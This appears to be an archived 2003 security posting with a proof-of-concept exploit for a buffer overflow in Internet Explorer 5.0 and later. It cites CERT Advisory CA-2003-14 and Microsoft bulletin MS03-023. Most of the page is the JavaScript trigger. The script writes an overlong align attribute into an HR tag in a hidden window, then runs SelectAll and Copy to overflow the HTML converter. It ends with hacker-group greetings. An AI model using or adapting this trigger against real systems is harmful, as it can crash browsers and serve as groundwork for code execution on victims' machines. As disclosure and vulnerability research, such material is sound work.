Related information

Internet Explorer buffer overflow

CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML

Microsoft Security Bulletin MS03-023: Buffer Overrun In HTML Converter Could Allow Code Execution (Q823559)

PoC for Internet Explorer >=5.0 buffer overflow (trivial exploit for hard case).

From:	Digital Scream <digitalscream_(at)_real.xakep.ru>
Date:	24.06.2003
Subject:	Internet Explorer >=5.0 : Buffer overflow

<script>

wnd=open("about:blank","","");

wnd.moveTo(screen.Width,screen.Height);

WndDoc=wnd.document;

WndDoc.open();

WndDoc.clear();

buffer="";

for(i=1;i<=127;i++)buffer+="X";

buffer+="DigitalScream";

WndDoc.write("<HR align='"+buffer+"'>");

WndDoc.execCommand("SelectAll");

WndDoc.execCommand("Copy");

wnd.close();

</script>



Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew